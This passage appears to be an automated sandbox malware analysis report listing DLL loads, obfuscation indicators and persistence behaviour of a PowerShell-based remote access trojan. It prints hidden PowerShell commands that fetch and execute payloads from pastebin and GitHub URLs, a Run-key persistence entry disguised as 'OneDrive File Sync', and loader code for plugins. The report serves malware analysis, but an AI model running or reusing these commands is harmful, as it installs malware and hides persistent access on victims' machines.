              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: avicap32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvfw32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\forfiles.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: BeginSync.lnk.1.dr LNK file: ..\..\..\Windows\System32\forfiles.exe
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.pdbhP source: powershell.exe, 00000001.00000002.1897623908.0000020A9BC1D000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: n.pDB source: powershell.exe, 00000001.00000002.1929630337.0000020AB294E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.pdb source: powershell.exe, 00000001.00000002.1897623908.0000020A9BC1D000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs .Net Code: Memory
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs .Net Code: Memory
              Source: powershell.exe, 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: dotNetProtector
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: dotNetProtector
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 1_2_00007FF887CE54B8 pushfd ; iretd 1_2_00007FF887CE5591
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_00007FF887CE785E push eax; iretd 10_2_00007FF887CE786D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_00007FF887CE782E pushad ; iretd 10_2_00007FF887CE785D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_00007FF887CE756B push ebx; iretd 10_2_00007FF887CE756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_00007FF887CE7450 push ebx; iretd 10_2_00007FF887CE756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 10_2_00007FF887DA6DC3 push edi; iretd 10_2_00007FF887DA6DC6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 13_2_00007FF887CD794D push ebx; retf 13_2_00007FF887CD796A
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  File created: C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  File created: C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.dll

              Boot Survival

              Source: Yara match  File source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,10
9,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: NULL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
